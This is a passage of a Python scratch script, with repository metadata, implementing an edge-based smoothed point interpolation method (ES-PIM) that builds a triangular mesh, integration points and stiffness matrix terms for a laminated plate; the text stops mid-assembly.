d23ae69ad4c79024b997a232247b4ae0e1e7031c
|
[
"BSD-2-Clause"
] | 8
|
2017-06-16T15:50:43.000Z
|
2021-12-01T10:20:36.000Z
|
scratch/espim_example.py
|
compmech/particles
|
d23ae69ad4c79024b997a232247b4ae0e1e7031c
|
[
"BSD-2-Clause"
] | 2
|
2017-12-27T11:07:04.000Z
|
2019-01-22T19:34:33.000Z
|
scratch/espim_example.py
|
compmech/particles
|
d23ae69ad4c79024b997a232247b4ae0e1e7031c
|
[
"BSD-2-Clause"
] | 4
|
2017-05-17T17:53:20.000Z
|
2019-04-03T01:57:58.000Z
|
"""ES-PIM
- prevents non-zero energy spurious modes for vibration / buckling analysis as
NS-PIM
- compared to SFEM using TRIA3, this approach is very similar, but much easily
extented to n-sided elements, since the integration is performed edge-wise
- results more precise than FEM using QUAD4 elements
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import coo_matrix
from pim.composite.laminate import read_stack
from pim.sparse import solve, is_symmetric
XGLOBAL = np.array([1., 0, 0])
YGLOBAL = np.array([0, 1., 0])
ZGLOBAL = np.array([0, 0, 1.])
def area_of_polygon(x, y):
"""Area of an arbitrary 2D polygon given its verticies
"""
area = 0.0
for i in range(-1, len(x)-1):
area += x[i] * (y[i+1] - y[i-1])
return abs(area) / 2.0
def unitvec(vector):
"""Return the unit vector
"""
return vector / np.linalg.norm(vector)
class Property(object):
def __init__(self, A, B, D, E):
self.A = A
self.B = B
self.D = D
self.E = E
class IntegrationPoint(object):
def __init__(self, tria, n1, n2, n3, f1, f2, f3, nx, ny, nz, le):
self.pos = (f1*n1 + f2*n2 + f3*n3).pos
self.tria = tria
self.n1 = n1
self.n2 = n2
self.n3 = n3
self.f1 = f1
self.f2 = f2
self.f3 = f3
self.nx = nx
self.ny = ny
self.nz = nz # 3D case
self.le = le # length of the line where the integration point lies on
class Tria(object):
def __init__(self, n1, n2, n3):
self.n1 = n1
self.n2 = n2
self.n3 = n3
self.edges = []
self.nodes = [n1, n2, n3]
self.Ae = area_of_polygon([n1.pos[0], n2.pos[0], n3.pos[0]],
[n1.pos[1], n2.pos[1], n3.pos[1]])
self.prop = None # either define here or in Node
def getMid(self):
return 1/3*(self.n1 + self.n2 + self.n3)
class Edge(object):
def __init__(self, n1, n2):
self.n1 = n1
self.n2 = n2
self.nodes = [n1, n2]
self.trias = []
self.sdomain = []
self.ipts = []
self.Ac = None
def getMid(self):
return 0.5*(self.n1 + self.n2)
class Node(object):
def __init__(self, x, y, z):
self.pos = np.array([x, y, z], dtype=float)
self.edges = set()
self.trias = set()
self.sdomain = None
self.index = None
self.prop = None # either define here or in Tria
def __add__(self, val):
if isinstance(val, Node):
return Node(*(self.pos + val.pos))
else:
return Node(*(self.pos + val))
def __sub__(self, val):
if isinstance(val, Node):
return Node(*(self.pos - val.pos))
else:
return Node(*(self.pos - val))
def __rmul__(self, val):
if isinstance(val, Node):
return Node(*(self.pos * val.pos))
else:
return Node(*(self.pos * val))
def __lmul__(self, val):
return self.__rmul__(val)
a = 10.
b = 5.
plt.figure(dpi=300)
nodes = np.array([
Node(0, 0, 0),
Node(a/3, 0, 0),
Node(2*a/3, 0, 0),
Node(a, 0, 0),
Node(0, b/3, 0),
Node(a/3, b/3, 0),
Node(2*a/3, b/3, 0),
Node(a, b/3, 0),
Node(0, 2*b/3, 0),
Node(a/3, 2*b/3, 0),
Node(2*a/3, 2*b/3, 0),
Node(a, 2*b/3, 0),
Node(0, b, 0),
Node(a/3, b, 0),
Node(2*a/3, b, 0),
Node(a, b, 0),
])
trias = [
Tria(nodes[0], nodes[1], nodes[5]),
Tria(nodes[1], nodes[2], nodes[6]),
Tria(nodes[2], nodes[3], nodes[7]),
Tria(nodes[0], nodes[5], nodes[4]),
Tria(nodes[1], nodes[6], nodes[5]),
Tria(nodes[2], nodes[7], nodes[6]),
Tria(nodes[4], nodes[5], nodes[9]),
Tria(nodes[5], nodes[6], nodes[10]),
Tria(nodes[6], nodes[7], nodes[11]),
Tria(nodes[4], nodes[9], nodes[8]),
Tria(nodes[5], nodes[10], nodes[9]),
Tria(nodes[6], nodes[11], nodes[10]),
Tria(nodes[8], nodes[9], nodes[13]),
Tria(nodes[9], nodes[10], nodes[14]),
Tria(nodes[10], nodes[11], nodes[15]),
Tria(nodes[8], nodes[13], nodes[12]),
Tria(nodes[9], nodes[14], nodes[13]),
Tria(nodes[10], nodes[15], nodes[14]),
]
edges = np.array([
Edge(nodes[0], nodes[1]),
Edge(nodes[1], nodes[2]),
Edge(nodes[2], nodes[3]),
Edge(nodes[0], nodes[4]),
Edge(nodes[1], nodes[5]),
Edge(nodes[2], nodes[6]),
Edge(nodes[3], nodes[7]),
Edge(nodes[0], nodes[5]),
Edge(nodes[1], nodes[6]),
Edge(nodes[2], nodes[7]),
Edge(nodes[4], nodes[5]),
Edge(nodes[5], nodes[6]),
Edge(nodes[6], nodes[7]),
Edge(nodes[4], nodes[8]),
Edge(nodes[5], nodes[9]),
Edge(nodes[6], nodes[10]),
Edge(nodes[7], nodes[11]),
Edge(nodes[4], nodes[9]),
Edge(nodes[5], nodes[10]),
Edge(nodes[6], nodes[11]),
Edge(nodes[8], nodes[9]),
Edge(nodes[9], nodes[10]),
Edge(nodes[10], nodes[11]),
Edge(nodes[8], nodes[12]),
Edge(nodes[9], nodes[13]),
Edge(nodes[10], nodes[14]),
Edge(nodes[11], nodes[15]),
Edge(nodes[8], nodes[13]),
Edge(nodes[9], nodes[14]),
Edge(nodes[10], nodes[15]),
Edge(nodes[12], nodes[13]),
Edge(nodes[13], nodes[14]),
Edge(nodes[14], nodes[15]),
])
for edge in edges:
edge.n1.edges.add(edge)
edge.n2.edges.add(edge)
plt.plot([edge.n1.pos[0], edge.n2.pos[0]],
[edge.n1.pos[1], edge.n2.pos[1]], '--k', lw=0.5, mfc=None)
for tria in trias:
if len(set(edge.nodes) & set(tria.nodes)) == 2:
tria.edges.append(edge)
edge.trias.append(tria)
for node in tria.nodes:
node.trias.add(tria)
# __________________________________________________________________
#
# the code above will come from an external triangulation algorithm
# __________________________________________________________________
#
# FOCUS HERE AND BELOW
# __________________________________________________________________
for edge in edges:
if len(edge.trias) == 1:
tria1 = edge.trias[0]
tria2 = None
othernode1 = (set(tria1.nodes) - set(edge.nodes)).pop()
mid1 = tria1.getMid()
elif len(edge.trias) == 2:
tria1 = edge.trias[0]
tria2 = edge.trias[1]
othernode1 = (set(tria1.nodes) - set(edge.nodes)).pop()
othernode2 = (set(tria2.nodes) - set(edge.nodes)).pop()
mid1 = tria1.getMid()
mid2 = tria2.getMid()
else:
raise NotImplementedError('ntrias != 1 or 2 for an edge')
node1 = edge.nodes[0]
node2 = edge.nodes[1]
ipts = []
sdomain = []
# to guarantee outward normals
sign = 1
if np.dot(np.cross((mid1 - node2).pos, (node1 - node2).pos), ZGLOBAL) < 0:
sign = -1
tmpvec = (node1 - mid1).pos
nx, ny, nz = unitvec(np.cross(tmpvec, sign*ZGLOBAL))
sdomain.append(node1)
sdomain.append(mid1)
le = np.sqrt(((node1.pos - mid1.pos)**2).sum())
ipt = IntegrationPoint(tria1, node1, node2, othernode1, 2/3, 1/6, 1/6, nx, ny, nz, le)
ipts.append(ipt)
#NOTE check only if for distorted meshes these ratios 2/3, 1/6, 1/6 are
# still valid
#ipt = ipts[-1]
#A1 = area_of_polygon([node1.pos[0], node2.pos[0], othernode1.pos[0]],
#[node1.pos[1], node2.pos[1], othernode1.pos[1]])
#fA1 = area_of_polygon([ipt.pos[0], node2.pos[0], othernode1.pos[0]],
#[ipt.pos[1], node2.pos[1], othernode1.pos[1]])
#print('DEBUG area: %1.3f = %1.3f' % (fA1/A1, 2/3))
tmpvec = (mid1 - node2).pos
nx, ny, nz = unitvec(np.cross(tmpvec, sign*ZGLOBAL))
sdomain.append(node2)
le = np.sqrt(((mid1.pos - node2.pos)**2).sum())
ipt = IntegrationPoint(tria1, node1, node2, othernode1, 1/6, 2/3, 1/6, nx, ny, nz, le)
ipts.append(ipt)
if tria2 is None:
tmpvec = (node2 - node1).pos
nx, ny, nz = unitvec(np.cross(tmpvec, sign*ZGLOBAL))
sdomain.append(node1)
le = np.sqrt(((node2.pos - node1.pos)**2).sum())
ipt = IntegrationPoint(tria1, node1, node2, othernode1, 1/2, 1/2, 0, nx, ny, nz, le)
ipts.append(ipt)
else:
tmpvec = (node2 - mid2).pos
nx, ny, nz = unitvec(np.cross(tmpvec, sign*ZGLOBAL))
sdomain.append(mid2)
le = np.sqrt(((node2.pos - mid2.pos)**2).sum())
ipt = IntegrationPoint(tria2, node1, node2, othernode2, 1/6, 2/3, 1/6, nx, ny, nz, le)
ipts.append(ipt)
tmpvec = (mid2 - node1).pos
nx, ny, nz = unitvec(np.cross(tmpvec, sign*ZGLOBAL))
sdomain.append(node1)
le = np.sqrt(((mid2.pos - node1.pos)**2).sum())
ipt = IntegrationPoint(tria2, node1, node2, othernode2, 2/3, 1/6, 1/6, nx, ny, nz, le)
ipts.append(ipt)
edge.sdomain = sdomain
edge.Ac = area_of_polygon([sr.pos[0] for sr in sdomain[:-1]],
[sr.pos[1] for sr in sdomain[:-1]])
edge.ipts = ipts
xcoord = [pt.pos[0] for pt in sdomain]
ycoord = [pt.pos[1] for pt in sdomain]
plt.plot(xcoord, ycoord, '-k', lw=0.25)
xcoord = [ipt.pos[0] for ipt in ipts]
ycoord = [ipt.pos[1] for ipt in ipts]
plt.plot(xcoord, ycoord, 'xk', mew=0.25, mfc='None')
xcord = [node.pos[0] for node in nodes]
ycord = [node.pos[1] for node in nodes]
plt.scatter(xcord, ycord)
plt.gca().set_aspect('equal')
# ASSEMBLYING GLOBAL MATRICES
# renumbering nodes using Liu's suggested algorithm
# - sorting nodes from a minimum spatial position to a maximum one
# - Node oject will carry an index that will position it in the global
# stiffness matrix
nodes_xyz = np.array([n.pos for n in nodes])
index_ref_point = nodes_xyz.min(axis=0)
index_dist = ((nodes_xyz - index_ref_point)**2).sum(axis=-1)
indices = np.argsort(index_dist)
ind2node = {}
for i, node in enumerate(nodes):
node.index = i
#node.index = indices[i]
#ind2node[node.index] = node
n = nodes.shape[0]
dof = 5
# material properties
E11 = 71.e9
nu = 0.33
plyt = 0.01
lam = read_stack([0], plyt=plyt, laminaprop=(E11, E11, nu))
prop = Property(lam.A, lam.B, lam.D, lam.E)
for tria in trias:
tria.prop = prop
#TODO allocate less memory here...
k0 = np.zeros((n*dof, n*dof), dtype=np.float64)
prop_from_node = False
count = 0
Atotal = 0
for edge in edges:
n1 = edge.nodes[0]
n2 = edge.nodes[1]
Ac = edge.Ac
Atotal += Ac
ipts = edge.ipts
for ipt in ipts:
if True:
# plotting arrows indicating normals for each integration point
A1 = area_of_polygon([tria.n1.pos[0], tria.n2.pos[0], tria.n3.pos[0]],
[tria.n1.pos[1], tria.n2.pos[1], tria.n3.pos[1]])
f = 0.05
la = A1**0.5/8
plt.arrow(ipt.pos[0]-la*ipt.nx, ipt.pos[1]-la*ipt.ny,
f*ipt.nx, f*ipt.ny, head_width=0.05,
head_length=0.05, fc='k', ec='k')
indices = set()
for ipt in ipts:
indices.add(ipt.n1.index)
indices.add(ipt.n2.index)
indices.add(ipt.n3.index)
indices = sorted(list(indices))
if len(ipts) == 3:
indices.append(-1) # fourth dummy index
indexpos = dict([[ind, i] for i, ind in enumerate(indices)])
i1, i2, i3, i4 = indices
f1 = [0, 0, 0, 0]
f2 = [0, 0, 0, 0]
f3 = [0, 0, 0, 0]
f4 = [0, 0, 0, 0]
nx1 = ipts[0].nx
ny1 = ipts[0].ny
le1 = ipts[0].le
f1[indexpos[ipts[0].n1.index]] = ipts[0].f1
f1[indexpos[ipts[0].n2.index]] = ipts[0].f2
f1[indexpos[ipts[0].n3.index]] = ipts[0].f3
nx2 = ipts[1].nx
ny2 = ipts[1].ny
le2 = ipts[1].le
f21 = ipts[1].f1
f22 = ipts[1].f2
f23 = ipts[1].f3
f2[indexpos[ipts[1].n1.index]] = ipts[1].f1
f2[indexpos[ipts[1].n2.index]] = ipts[1].f2
f2[indexpos[ipts[1].n3.index]] = ipts[1].f3
nx3 = ipts[2].nx
ny3 = ipts[2].ny
le3 = ipts[2].le
f3[indexpos[ipts[2].n1.index]] = ipts[2].f1
f3[indexpos[ipts[2].n2.index]] = ipts[2].f2
f3[indexpos[ipts[2].n3.index]] = ipts[2].f3
if len(ipts) == 3:
nx4 = 0
ny4 = 0
le4 = 0
else:
nx4 = ipts[3].nx
ny4 = ipts[3].ny
le4 = ipts[3].le
f4[indexpos[ipts[3].n1.index]] = ipts[3].f1
f4[indexpos[ipts[3].n2.index]] = ipts[3].f2
f4[indexpos[ipts[3].n3.index]] = ipts[3].f3
f11, f12, f13, f14 = f1
f21, f22, f23, f24 = f2
f31, f32, f33, f34 = f3
f41, f42, f43, f44 = f4
#FIXME do some weighted average on A, B, D
# either use properties from tria or nodes
if prop_from_node:
pass
#A = f1*ipt.n1.prop.A + f2*ipt.n2.prop.A + f3*ipt.n3.prop.A
#B = f1*ipt.n1.prop.B + f2*ipt.n2.prop.B + f3*ipt.n3.prop.B
#D = f1*ipt.n1.prop.D + f2*ipt.n2.prop.D + f3*ipt.n3.prop.D
#E = f1*ipt.n1.prop.E + f2*ipt.n2.prop.E + f3*ipt.n3.prop.E
else:
A = ipts[0].tria.prop.A
B = ipts[0].tria.prop.B
D = ipts[0].tria.prop.D
A11 = A[0, 0]
A12 = A[0, 1]
A16 = A[0, 2]
A22 = A[1, 1]
A26 = A[1, 2]
A66 = A[2, 2]
B11 = B[0, 0]
B12 = B[0, 1]
B16 = B[0, 2]
B22 = B[1, 1]
B26 = B[1, 2]
B66 = B[2, 2]
D11 = D[0, 0]
D12 = D[0, 1]
D16 = D[0, 2]
D22 = D[1, 1]
D26 = D[1, 2]
D66 = D[2, 2]
#TODO calculate only upper triangle
k0[i1*dof+0, i1*dof+0] += Ac*((A11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+0, i1*dof+1] += Ac*((A12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+0, i1*dof+3] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+0, i1*dof+4] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+0, i2*dof+0] += Ac*((A11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+0, i2*dof+1] += Ac*((A12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+0, i2*dof+3] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+0, i2*dof+4] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+0, i3*dof+0] += Ac*((A11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+0, i3*dof+1] += Ac*((A12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+0, i3*dof+3] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+0, i3*dof+4] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+0, i4*dof+0] += Ac*((A11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+0, i4*dof+1] += Ac*((A12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+0, i4*dof+3] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+0, i4*dof+4] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+1, i1*dof+0] += Ac*((A12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+1, i1*dof+1] += Ac*((A22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+1, i1*dof+3] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+1, i1*dof+4] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+1, i2*dof+0] += Ac*((A12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+1, i2*dof+1] += Ac*((A22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+1, i2*dof+3] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
